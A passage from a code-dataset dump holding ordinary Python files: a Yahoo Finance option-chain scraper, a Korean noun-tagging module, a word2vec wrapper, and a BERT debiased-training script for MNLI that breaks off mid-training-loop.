expiry_dates=bs_json[1][0][0]['expirationDates']\n\n\t\t\t## Also need spot price as an output\n\t\t\t#spot_price=bs_json[0].iloc[0]['optionChain']['result'][0]['quote'][\n\t\t\t#\t'regularMarketPrice']\n spot_price=bs_json[1][0][0]['quote']['regularMarketPrice']\n\t\t\t## The time when the data was queried; this should be in eastern time\n\t\t\t## so no need for any conversions.\n\t\t\t#tquery=bs_json[0].iloc[0]['optionChain']['result'][0]['quote']['regularMarketTime']\n tquery=bs_json[1][0][0]['quote']['regularMarketTime']\n ## not really tnow, this was the time when the data was queried. \n\t\t\t## Using this as the output for tnow.\n\t\t\t## Might be interesting to get the market time for all the other \n\t\t\t## chains (.iloc[0] to highest row number) to see how different the \n\t\t\t## times are. It takes some time to access each chain, causing a delay\n tnow=pd.to_datetime(datetime.utcfromtimestamp(tquery))\n\t\t\n\t\t## throw error if the file does not exist\n except: #FileNotFoundError\n print('File not found, check filename, directory')\n tnow=''\n expiry_dates=''\n spot_price=''\n df=''\n\t\t\n\t\t\n\t\t\n\t\n\t## If no datafile is given, query the data from yahoo website\n else:\n\n\t\t## First get expiry dates.\n\t\t## use query1.stuff or query2?\n url_string=('https://query1.finance.yahoo.com/v7/finance/options/'+ticker)\n\t\t#bs_json = pd.io.json.read_json(url_string)\n bs_json = pd.read_json(url_string)\n\t\t## found through trial and error, hopefully all yahoo option chains \n\t\t## look like this\n entries=bs_json['optionChain']['result'][0].keys()\n\t\t## We should keep the expiry dates, maybe output the array of expiry \n\t\t## dates\n\t\t#expiry_dates=bs_json['optionChain']['result'][0][entries[1]]\n expiry_dates=bs_json['optionChain']['result'][0]['expirationDates']\n \n\t\t## Kelly's idea:\n\t\t## initialize an empty dataframe with len(expiry_dates) number of rows;\n\t\t## each row will contain the json result for a given expiry date\n\t\t## or, append to list?\n\t\t## Is this fastest, or is there a better way?\n option_chain_multi=[]\n\n for date in expiry_dates:\n url_date=url_string+'?date='+str(date)\n\t\t\t#option_chain_multi.append(pd.io.json.read_json(url_date))\n option_chain_multi.append(pd.read_json(url_date))\n\n\t\n\t\t## Near here:\n\t\t## Get the risk free rate?\n\t\t## (scrape wallstreetjournal? \n\t\t## 'https://www.wsj.com/market-data/bonds/treasuries'\n\n\t\t## need the date and time if we want to write to a csv file.\n\t\t## Get this immediately after pinging the website.\n tnow=pd.to_datetime('today').now()\n\t\n\t\t## now make a dataframe, and save it\n option_chain=pd.DataFrame(np.squeeze(option_chain_multi))\t\n #option_chain=pd.concat(option_chain_multi).reset_index()\n\t\t##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t## Now, perform the necessary work to write to file.\n\t\t## convert local time to utc.\n\t\t#tnow=?\n #tnow=tnow.tz_localize(timezone).tz_convert('utc')\n\t\t## in practice though, we will just assume all times (for stock purposes) \n\t\t## to be in eastern time, so just convert our local time to that\n tnow=tnow.tz_localize(timezone).tz_convert('US/Eastern')\n\t\t## the time to expiration is today's date subtracted from the future date;\n\t\t## get the result in units of days!\n\t\t## Maybe texp belongs in a script or function where this function is \n\t\t## called from\n\t\t#texp=(pd.Timestamp(exp_date).tz_localize('US/Eastern')-pd.Timestamp(tnow)\n\t\t#\t)/np.timedelta64(1,'D')\t\t\n\t\t## code to check the current date, and make a folder for today's date if \n\t\t## it does not exist.\n\t\t## this next line can be the default if no path is given?\n\t\t#path=os.getcwd()+time.strftime(\"/%Y/%m/%d\")\n\t\t## in future, change target_dir to the path variable, given as an input to\n\t\t## the function\n path=target_dir+tnow.strftime(\"/%Y/%m/%d\")\n\t\t## the line below is apparently for python 3!\n\t\t#os.makedirs(path, exist_ok=True)\n\t\t## Workaround for python 2\n if not os.path.exists(path):\n os.makedirs(path)\n\t\t## convert tnow, the time at which the data was retrieved, into a \n\t\t## string for a filename.\n tnow_str=tnow.strftime(\"%Y_%m_%d_%H_%M\")\n\t\n filename=path+'/'+tnow_str+'_'+ticker+'_full_chain'+'.txt'\n\t\n option_chain.to_json(filename)\n\t\t##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t## Clean up the data for output variables of this function!\n\t\t#strikes=bs_json['optionChain']['result'][0][entries[2]]\n\t\t## could also use midpoint of bid ask?\n\t\t#spot_price=option_chain[0][0]['optionChain']['result'][0]['quote'][\n\t\t#\t'regularMarketPrice']\n #spot_price=option_chain.iloc[0]['result'][0]['quote'][\n # 'regularMarketPrice']\n spot_price=option_chain[1][0][0]['quote']['regularMarketPrice']\n\n\t\n\n\t\t## How to best make a dataframe from the option_chain? (clean it up)\n\t\t#option_chain[0][0]['optionChain']['result'][0]['options'][0]['puts']\n\t\n\t\t## Maybe this is the best way to concatenate the dataframes?\n\t\t## DO NOT INCLUDE OPTION CHAINS THAT HAVE NO DATA!\n pframes=[pd.DataFrame(\n\t\t\tchain['optionChain']['result'][0]['options'][0]['puts']) \n\t\t\tfor chain in option_chain_multi]\n\t\t## set index to strike for each dataframe in list? What is best way?\n\t\t#for df in pframes:\n\t\t#\tif 'strike' in df.columns:\n\t\t#\t\tdf.set_index(['expiration','strike'],inplace=True)\n\n\t\n cframes=[pd.DataFrame(\n\t\t\tchain['optionChain']['result'][0]['options'][0]['calls']) \n\t\t\tfor chain in option_chain_multi]\n\t\n\t\t## make a multi index first?\n\t\t#strike=df_calls.strike.unique()\n\t\t#index=pd.MultiIndex.from_product([map(str,expiry_dates),strike],\n\t\t#\tnames=[expiry_dates,strike])\n\n\t\t## I should make it so that the index level after expiry dates is strike\n\t\t## price\n df_puts=pd.concat(pframes,ignore_index=True)\n\t\t## is now a good time to convert expiration column to pandas datetime?\n\t\t#df_puts.set_index(['expiration','strike'],inplace=True)\n\t\t#df_puts = pd.concat(pframes, keys=expiry_dates,names=['expiry_date','strike'])\n\t\t## do the same for calls:\n df_calls=pd.concat(cframes,ignore_index=True)\n\t\t#df_calls.set_index(['expiration','strike'],inplace=True)\n\n\t\t## New method: Make one dataframe for calls and puts\n\t\t## merge on strike:\n df=df_calls.merge(df_puts,how='outer',on=['expiration','strike'],suffixes=('_c','_p'))\n\t\t## Hmm, having problems with this too...\n\t\t#df.expiration=df.expiration.apply(lambda d: datetime.utcfromtimestamp(d))\t\n\t\t## Last trade dates may have NaN entries, so clean these outside of here?\n\t\t#df.lastTradeDate_c=df.lastTradeDate_c.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t#df.lastTradeDate_p=df.lastTradeDate_p.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t#df.set_index(['expiration','strike'],inplace=True)\n\t\t#df=df.reindex(pd.MultiIndex.from_product(\n\t\t#\t[df.index.levels[0],df.index.levels[1].unique()],\n\t\t#\tnames=['expiration','strike']),fill_value=np.NaN)\n\n\n\t\t## old method:\n\t\t#df_calls = pd.concat(cframes, keys=expiry_dates)\n\t\t## should I join the two dataframes, calls and puts?\n\t\t## can index the different expiration dates by key:\n\t\t## (You will likely use this functionality in scripts that call this\n\t\t## function) \n\t\t#df_keys.loc[expiry_dates[0]] \n\n\t\t## should I put into the dataframe: tnow, time to expiration for each\n\t\t## option, and the spot price?\n\t\t## Need also risk-free rate from scraped bond data for each expiry\n\t\t## (separate bond-scraper from this function?)\n\n\n\t\t## should expiry dates be transformed to a regular datetime?\n\t\t#datetime.utcfromtimestamp(expiry_dates)+timedelta(hours=16)\n\n return tnow,expiry_dates,spot_price,df\n\n","repo_name":"jjwalkerwvu/finance","sub_path":"codes/data_cleaning/yahoo_option_chain_multi_exp.py","file_name":"yahoo_option_chain_multi_exp.py","file_ext":"py","file_size_in_byte":11438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27659266436","text":"# 체언(명사, 대명사, 수사)을 다루는 모듈\nfrom module.jamostoolkit import *\nfrom .che_eon_list import *\nfrom module.basic import namePumsa\n\ndef nameNoun(l):\n pumsalist = []\n for i in range(0, len(l)):\n if (isinstance(l[i], list)):\n continue\n word = l[i]\n check = JamosSeparator(word) #초성분리 모듈사용 (jamostoolkit)\n check.run() # 초성분리 동작\n chosung = check.get()[0] # 분리 결과값 받아오는 메서드\n if chosung == 'ㄱ':\n pumsalist = alist\n elif chosung == 'ㄴ':\n pumsalist = blist\n elif chosung == 'ㄷ':\n pumsalist = clist\n elif chosung == 'ㄹ':\n pumsalist = dlist\n elif chosung == 'ㅁ':\n pumsalist = elist\n elif chosung == 'ㅂ':\n pumsalist = flist\n elif chosung == 'ㅅ':\n pumsalist = glist\n elif chosung == 'ㅇ':\n pumsalist = hlist\n elif chosung == 'ㅈ':\n pumsalist = ilist\n elif chosung == 'ㅊ':\n pumsalist = jlist\n elif chosung == 'ㅋ':\n pumsalist = klist\n elif chosung == 'ㅌ':\n pumsalist = llist\n elif chosung is 'ㅍ':\n pumsalist = mlist\n elif chosung is 'ㅎ':\n pumsalist = nlist\n\n if l[i] in pumsalist:\n templist = [l[i], '명사']\n del l[i]\n l.insert(i, templist)\n return l\n\ndef processCheEon(l):\n l = namePumsa(l, susaList, '수사')\n l = namePumsa(l, daemyungsaList, '대명사')\n l = nameNoun(l)\n return l\n","repo_name":"oronaminc/KR-Parts-_of_speech-Analyzer","sub_path":"module/che_eon/che_eon.py","file_name":"che_eon.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7907309109","text":"# Word embeddings for input to seq2seq\n# Cheng Shen\n# May 21st 2019\n\n# Reference:\n# https://towardsdatascience.com/implementing-word2vec-in-pytorch-skip-gram-model-e6bae040d2fb\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport numpy as np\nimport re\n\nfrom gensim.test.utils import datapath\nfrom gensim.models.word2vec import LineSentence\nfrom gensim.sklearn_api import W2VTransformer\nfrom gensim.models import Word2Vec\n\nEMBEDDING_DIM = 500\nWINDOW_SIZE = 2 # The words in range (-WINDOW_SIZE, 0, WINDOW_SIZE) are included\nEOS = \"*end*\"\nSTART = \"*start*\"\n\n\ncomputing_device = torch.device(\"cpu\")\nif torch.cuda.is_available():\n print(\"Using CUDA\")\n computing_device = torch.device(\"cuda:1\") # CUDA device may be different\n\nclass word2vec:\n def __init__(self):\n self.model = Word2Vec(size=EMBEDDING_DIM, min_count=0, seed=1, workers=4)\n\n def fit(self, filename=\"/home/aufish/Documents/19SP/NeuralBot_2/Data/cornell_data/pure_movie_lines.txt\"):\n essays1 = LineSentence(datapath(filename))\n self.model.build_vocab(essays1)\n essays2 = LineSentence(datapath(filename))\n self.model.train(essays2, total_examples=self.model.corpus_count, epochs=5)\n\n def transform(self, sentence):\n if type(sentence) == str:\n sentence = sentence.split(\" \")\n # sentene is a list of words\n result = []\n for word in sentence:\n word = word.lower().strip().strip(\",.!?\\\"\\'()\")\n if word == \"\":\n continue\n result.append(word)\n\n return torch.tensor([self.model.wv[word] for word in result], device=computing_device)\n\n def transform_pair(self, sentence1, sentence2):\n return (self.transform(sentence1), self.transform(sentence2))\n\n def save(self, filename=\"word2vec.model\"):\n self.model.save(filename)\n\n def load(self, filename=\"word2vec.model\"):\n self.model = Word2Vec.load(filename)","repo_name":"SCAuFish/Neural-Chatbot","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12025206928","text":"\"\"\"\nScript to train BERT on MNLI with our loss function\n\nModified from the old \"run_classifier\" script from\nhttps://github.com/huggingface/pytorch-transformer\n\nGenerally I tried not to change much, but I did add variable length sequence encoding\nand parallel pre-processing for the sake of performance\n\nFair warning, I probably broke some of the multi-gpu stuff, I have only tested the single GPU version\n\"\"\"\n\nimport argparse\nimport json\nimport logging\nimport os\nimport random\nfrom collections import namedtuple\nfrom os.path import join, exists\nfrom typing import List, Dict, Iterable\n\nimport numpy as np\nfrom pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE\nfrom pytorch_pretrained_bert.modeling import BertConfig, WEIGHTS_NAME, CONFIG_NAME\nfrom pytorch_pretrained_bert.optimization import BertAdam, warmup_linear\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom torch.nn import CrossEntropyLoss\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, Dataset, Sampler\nfrom tqdm import trange, tqdm\n\nfrom debias import config\nfrom debias.bert import clf_debias_loss_functions\nfrom debias.bert.bert_with_debias_loss import BertWithDebiasLoss\nfrom debias.bert.clf_debias_loss_functions import *\nfrom debias.utils import py_utils\nfrom debias.utils.process_par import Processor, process_par\n\n# Its a hack, but I didn't want a tensorflow dependency be required to run this code, so\n# for now we just copy-paste MNLI loading stuff from debias/datasets/mnli\n\nHANS_URL = \"https://raw.githubusercontent.com/tommccoy1/hans/master/heuristics_evaluation_set.txt\"\n# Taken from the GLUE script\nMNLI_URL = \"https://firebasestorage.googleapis.com/v0/b/mtl-sentence-representations.appspot.com/o/data%2FMNLI.zip?alt=media&token=50329ea1-e339-40e2-809c-10c40afff3ce\"\n\nMNLI_BIAS_DRIVE_IDS = {\n \"train\": \"1ctP0T93F02IjWh4m1CMUdrSRQnoxEg6f\",\n \"dev\": \"10PcUMd6xqXArwRPCkIYjIwdL59f2p5TO\",\n \"hans\": \"1DEQaUmwfTgK6kSHqXj5phySPYwUq-52S\",\n}\n\nNLI_LABELS = [\"contradiction\", \"entailment\", \"neutral\"]\nNLI_LABEL_MAP = {k: i for i, k in enumerate(NLI_LABELS)}\n\n\nTextPairExample = namedtuple(\"TextPairExample\", [\"id\", \"hypothesis\", \"premise\", \"label\"])\n\n\ndef load_hans(n_samples=None) -> List[TextPairExample]:\n out = []\n logging.info(\"Loading hans...\")\n src = join(config.HANS_SOURCE, \"heuristics_evaluation_set.txt\")\n if not exists(src):\n logging.info(\"Downloading source to %s...\" % config.HANS_SOURCE)\n py_utils.download_to_file(HANS_URL, src)\n\n with open(src, \"r\") as f:\n f.readline()\n lines = f.readlines()\n\n if n_samples is not None:\n lines = np.random.RandomState(16349 + n_samples).choice(lines, n_samples, replace=False)\n\n for line in lines:\n parts = line.split(\"\\t\")\n label = parts[0]\n if label == \"non-entailment\":\n label = 0\n elif label == \"entailment\":\n label = 1\n else:\n raise RuntimeError()\n s1, s2, pair_id = parts[5:8]\n out.append(TextPairExample(pair_id, s1, s2, label))\n return out\n\n\ndef ensure_mnli_is_downloaded():\n mnli_source = join(config.GLUE_SOURCE, \"MNLI\")\n if exists(mnli_source) and len(os.listdir(mnli_source)) > 0:\n return\n py_utils.download_zip(\"MNLI\", MNLI_URL, config.GLUE_SOURCE)\n\n\ndef load_mnli(is_train, sample=None) -> List[TextPairExample]:\n ensure_mnli_is_downloaded()\n if is_train:\n filename = join(config.GLUE_SOURCE, \"MNLI\", \"train.tsv\")\n else:\n filename = join(config.GLUE_SOURCE, \"MNLI\", \"dev_matched.tsv\")\n\n logging.info(\"Loading mnli \" + (\"train\" if is_train else \"dev\"))\n with open(filename) as f:\n f.readline()\n lines = f.readlines()\n\n if sample:\n lines = np.random.RandomState(26096781 + sample).choice(lines, sample, replace=False)\n\n out = []\n for line in lines:\n line = line.split(\"\\t\")\n out.append(TextPairExample(line[0], line[8], line[9], NLI_LABEL_MAP[line[-1].rstrip()]))\n return out\n\n\ndef load_bias(dataset_name) -> Dict[str, np.ndarray]:\n \"\"\"Load dictionary of example_id->bias where bias is a length 3 array\n of log-probabilities\"\"\"\n\n if dataset_name not in MNLI_BIAS_DRIVE_IDS:\n raise ValueError(dataset_name)\n bias_src = join(config.MNLI_WORD_OVERLAP_BIAS, dataset_name + \".pkl\")\n if not exists(bias_src):\n logging.info(\"Downloading MNLI bias to %s...\" % bias_src)\n py_utils.download_from_drive(MNLI_BIAS_DRIVE_IDS[dataset_name], bias_src)\n\n bias = py_utils.load_pickle(bias_src)\n for k, v in bias.items():\n # Convert from entail vs non-entail to 3-way classes by splitting non-entail\n # to neutral and contradict\n bias[k] = np.array([\n v[0] - np.log(2.),\n v[1],\n v[0] - np.log(2.),\n ])\n return bias\n\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self, example_id, input_ids, segment_ids, label_id, bias):\n self.example_id = example_id\n self.input_ids = input_ids\n self.segment_ids = segment_ids\n self.label_id = label_id\n self.bias = bias\n\n\nclass ExampleConverter(Processor):\n def __init__(self, max_seq_length, tokenizer):\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n\n def process(self, data: Iterable):\n features = []\n tokenizer = self.tokenizer\n max_seq_length = self.max_seq_length\n\n for example in data:\n tokens_a = tokenizer.tokenize(example.hypothesis)\n\n tokens_b = None\n if example.premise:\n tokens_b = tokenizer.tokenize(example.premise)\n # Modifies `tokens_a` and `tokens_b` in place so that the total\n # length is less than the specified length.\n # Account for [CLS], [SEP], [SEP] with \"- 3\"\n _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)\n else:\n # Account for [CLS] and [SEP] with \"- 2\"\n if len(tokens_a) > max_seq_length - 2:\n tokens_a = tokens_a[:(max_seq_length - 2)]\n\n tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"]\n segment_ids = [0] * len(tokens)\n\n if tokens_b:\n tokens += tokens_b + [\"[SEP]\"]\n segment_ids += [1] * (len(tokens_b) + 1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n features.append(\n InputFeatures(\n example_id=example.id,\n input_ids=np.array(input_ids),\n segment_ids=np.array(segment_ids),\n label_id=example.label,\n bias=None\n ))\n return features\n\n\nclass InputFeatureDataset(Dataset):\n\n def __init__(self, examples: List[InputFeatures]):\n self.examples = examples\n\n def __getitem__(self, index):\n return self.examples[index]\n\n def __len__(self):\n return len(self.examples)\n\n\ndef collate_input_features(batch: List[InputFeatures]):\n max_seq_len = max(len(x.input_ids) for x in batch)\n sz = len(batch)\n\n input_ids = np.zeros((sz, max_seq_len), np.int64)\n segment_ids = np.zeros((sz, max_seq_len), np.int64)\n mask = torch.zeros(sz, max_seq_len, dtype=torch.int64)\n for i, ex in enumerate(batch):\n input_ids[i, :len(ex.input_ids)] = ex.input_ids\n segment_ids[i, :len(ex.segment_ids)] = ex.segment_ids\n mask[i, :len(ex.input_ids)] = 1\n\n input_ids = torch.as_tensor(input_ids)\n segment_ids = torch.as_tensor(segment_ids)\n label_ids = torch.as_tensor(np.array([x.label_id for x in batch], np.int64))\n if batch[0].bias is None:\n return input_ids, mask, segment_ids, label_ids\n\n bias = torch.tensor([x.bias for x in batch])\n return input_ids, mask, segment_ids, label_ids, bias\n\n\nclass SortedBatchSampler(Sampler):\n def __init__(self, data_source, batch_size, seed):\n super().__init__(data_source)\n self.data_source = data_source\n self.batch_size = batch_size\n self.seed = seed\n if batch_size == 1:\n raise NotImplementedError()\n self._epoch = 0\n\n def __iter__(self):\n rng = np.random.RandomState(self._epoch + 601767 + self.seed)\n n_batches = len(self)\n batch_lens = np.full(n_batches, self.batch_size, np.int32)\n\n # Randomly select batches to reduce by size 1\n extra = n_batches*self.batch_size - len(self.data_source)\n batch_lens[rng.choice(len(batch_lens), extra, False)] -= 1\n\n batch_ends = np.cumsum(batch_lens)\n batch_starts = np.pad(batch_ends[:-1], [1, 0], \"constant\")\n\n if batch_ends[-1] != len(self.data_source):\n print(batch_ends)\n raise RuntimeError()\n\n bounds = np.stack([batch_starts, batch_ends], 1)\n rng.shuffle(bounds)\n\n for s, e in bounds:\n yield np.arange(s, e)\n\n def __len__(self):\n return (len(self.data_source) + self.batch_size - 1) // self.batch_size\n\n\ndef build_train_dataloader(data: List[InputFeatures], batch_size, seed, sorted):\n if sorted:\n data.sort(key=lambda x: len(x.input_ids))\n ds = InputFeatureDataset(data)\n sampler = SortedBatchSampler(ds, batch_size, seed)\n return DataLoader(ds, batch_sampler=sampler, collate_fn=collate_input_features)\n else:\n ds = InputFeatureDataset(data)\n return DataLoader(ds, batch_size=batch_size, sampler=RandomSampler(ds), collate_fn=collate_input_features)\n\n\ndef build_eval_dataloader(data: List[InputFeatures], batch_size):\n ds = InputFeatureDataset(data)\n return DataLoader(ds, batch_size=batch_size, sampler=SequentialSampler(ds), collate_fn=collate_input_features)\n\n\ndef convert_examples_to_features(\n examples: List[TextPairExample], max_seq_length, tokenizer, n_process=1):\n converter = ExampleConverter(max_seq_length, tokenizer)\n return process_par(examples, converter, n_process, chunk_size=2000, desc=\"featurize\")\n\n\ndef _truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\n\ndef simple_accuracy(preds, labels):\n return (preds == labels).mean()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--bert_model\", default=\"bert-base-uncased\", type=str,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n \"bert-base-multilingual-cased, bert-base-chinese.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model predictions and checkpoints will be written.\")\n parser.add_argument(\"--cache_dir\",\n default=\"\",\n type=str,\n help=\"Where do you want to store the pre-trained models downloaded from s3\")\n parser.add_argument(\"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_train\",\n action='store_true',\n help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\",\n action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--train_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for training.\")\n parser.add_argument(\"--seed\",\n default=None,\n type=int,\n help=\"Seed for randomized elements in the training\")\n parser.add_argument(\"--eval_batch_size\",\n default=16,\n type=int,\n help=\"Total batch size for eval.\")\n parser.add_argument(\"--learning_rate\",\n default=5e-5,\n type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--num_train_epochs\",\n default=3.0,\n type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\",\n default=0.1,\n type=float,\n help=\"Proportion of training to perform linear learning rate warmup for. \"\n \"E.g., 0.1 = 10%% of training.\")\n parser.add_argument(\"--no_cuda\",\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n parser.add_argument('--gradient_accumulation_steps',\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\n parser.add_argument('--fp16',\n action='store_true',\n help=\"Whether to use 16-bit float precision instead of 32-bit\")\n parser.add_argument('--loss_scale',\n type=float, default=0,\n help=\"Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\\n\"\n \"0 (default value): dynamic loss scaling.\\n\"\n \"Positive power of 2: static loss scaling value.\\n\")\n\n ## Our arguements\n parser.add_argument(\"--mode\", choices=[\"bias_product\", \"none\", \"learned_mixin\", \"reweight\"],\n default=\"learned_mixin\", help=\"Kind of debiasing method to use\")\n parser.add_argument(\"--penalty\", type=float, default=0.03,\n help=\"Penalty weight for the learn_mixin model\")\n parser.add_argument(\"--n_processes\", type=int, default=4,\n help=\"Processes to use for pre-processing\")\n parser.add_argument(\"--debug\", action=\"store_true\")\n parser.add_argument(\"--sorted\", action=\"store_true\",\n help='Sort the data so most batches have the same input length,'\n ' makes things about 2x faster. Our experiments did not actually'\n ' use this in the end (not sure if it makes a difference) so '\n 'its off by default.')\n\n args = parser.parse_args()\n\n py_utils.add_stdout_logger()\n\n if args.mode == \"none\":\n loss_fn = clf_debias_loss_functions.Plain()\n elif args.mode == \"reweight\":\n loss_fn = clf_debias_loss_functions.ReweightByInvBias()\n elif args.mode == \"bias_product\":\n loss_fn = clf_debias_loss_functions.BiasProduct()\n elif args.mode == \"learned_mixin\":\n loss_fn = clf_debias_loss_functions.LearnedMixin(args.penalty)\n else:\n raise RuntimeError()\n\n output_dir = args.output_dir\n\n if args.do_train:\n if exists(output_dir):\n if len(os.listdir(output_dir)) > 0:\n raise ValueError(\"Output dir exists and is non-empty\")\n else:\n os.makedirs(output_dir)\n\n print(\"Saving model to %s\" % output_dir)\n\n if args.local_rank == -1 or args.no_cuda:\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n n_gpu = torch.cuda.device_count()\n else:\n torch.cuda.set_device(args.local_rank)\n device = torch.device(\"cuda\", args.local_rank)\n n_gpu = 1\n # Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n torch.distributed.init_process_group(backend='nccl')\n logging.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(\n device, n_gpu, bool(args.local_rank != -1), args.fp16))\n\n if args.gradient_accumulation_steps < 1:\n raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\n args.gradient_accumulation_steps))\n\n args.train_batch_size = args.train_batch_size // args.gradient_accumulation_steps\n\n if args.seed is not None:\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if n_gpu > 0:\n torch.cuda.manual_seed_all(args.seed)\n \n if not args.do_train and not args.do_eval:\n raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\")\n\n if os.path.exists(output_dir) and os.listdir(output_dir) and args.do_train:\n raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(output_dir))\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n # Its way ot easy to forget if this is being set by a command line flag\n if \"-uncased\" in args.bert_model:\n do_lower_case = True\n elif \"-cased\" in args.bert_model:\n do_lower_case = False\n else:\n raise NotImplementedError(args.bert_model)\n\n tokenizer = BertTokenizer.from_pretrained(args.bert_model, do_lower_case=do_lower_case)\n\n num_train_optimization_steps = None\n train_examples = None\n if args.do_train:\n train_examples = load_mnli(True, 2000 if args.debug else None)\n num_train_optimization_steps = int(\n len(train_examples) / args.train_batch_size / args.gradient_accumulation_steps) * args.num_train_epochs\n if args.local_rank != -1:\n num_train_optimization_steps = num_train_optimization_steps // torch.distributed.get_world_size()\n\n # Prepare model\n cache_dir = args.cache_dir if args.cache_dir else os.path.join(str(PYTORCH_PRETRAINED_BERT_CACHE),\n 'distributed_{}'.format(args.local_rank))\n\n model = BertWithDebiasLoss.from_pretrained(\n args.bert_model, cache_dir=cache_dir, num_labels=3, loss_fn=loss_fn)\n\n if args.fp16:\n model.half()\n model.to(device)\n if args.local_rank != -1:\n try:\n from apex.parallel import DistributedDataParallel as DDP\n except ImportError:\n raise ImportError(\n \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n model = DDP(model)\n elif n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n # Prepare optimizer\n param_optimizer = list(model.named_parameters())\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n if args.fp16:\n try:\n from apex.optimizers import FP16_Optimizer\n from apex.optimizers import FusedAdam\n except ImportError:\n raise ImportError(\n \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n optimizer = FusedAdam(optimizer_grouped_parameters,\n lr=args.learning_rate,\n bias_correction=False,\n max_grad_norm=1.0)\n if args.loss_scale == 0:\n optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)\n else:\n optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)\n\n else:\n optimizer = BertAdam(optimizer_grouped_parameters,\n lr=args.learning_rate,\n warmup=args.warmup_proportion,\n t_total=num_train_optimization_steps)\n\n global_step = 0\n nb_tr_steps = 0\n tr_loss = 0\n\n if args.do_train:\n train_features: List[InputFeatures] = convert_examples_to_features(\n train_examples, args.max_seq_length, tokenizer, args.n_processes)\n\n bias_map = load_bias(\"train\")\n for fe in train_features:\n fe.bias = bias_map[fe.example_id].astype(np.float32)\n\n logging.info(\"***** Running training *****\")\n logging.info(\" Num examples = %d\", len(train_examples))\n logging.info(\" Batch size = %d\", args.train_batch_size)\n logging.info(\" Num steps = %d\", num_train_optimization_steps)\n\n train_dataloader = build_train_dataloader(train_features, args.train_batch_size, args.seed, args.sorted)\n\n model.train()\n loss_ema = 0\n total_steps = 0\n decay = 0.99\n\n for _ in trange(int(args.num_train_epochs), desc=\"Epoch\", ncols=100):\n tr_loss = 0\n nb_tr_examples, nb_tr_steps = 0, 0\n pbar = tqdm(train_dataloader, desc=\"loss\", ncols=100)\n for step, batch in enumerate(pbar):\n batch = tuple(t.to(device) for t in batch)\n if bias_map is not None:\n input_ids, input_mask, segment_ids, label_ids, bias = batch\n else:\n bias = None\n input_ids, input_mask, segment_ids, label_ids = batch\n\n logits, loss = model(input_ids, segment_ids, input_mask, label_ids, bias)\n\n total_steps += 1\n loss_ema = loss_ema * decay + loss.cpu().detach().numpy() * (1 - decay)\n descript = \"loss=%.4f\" % 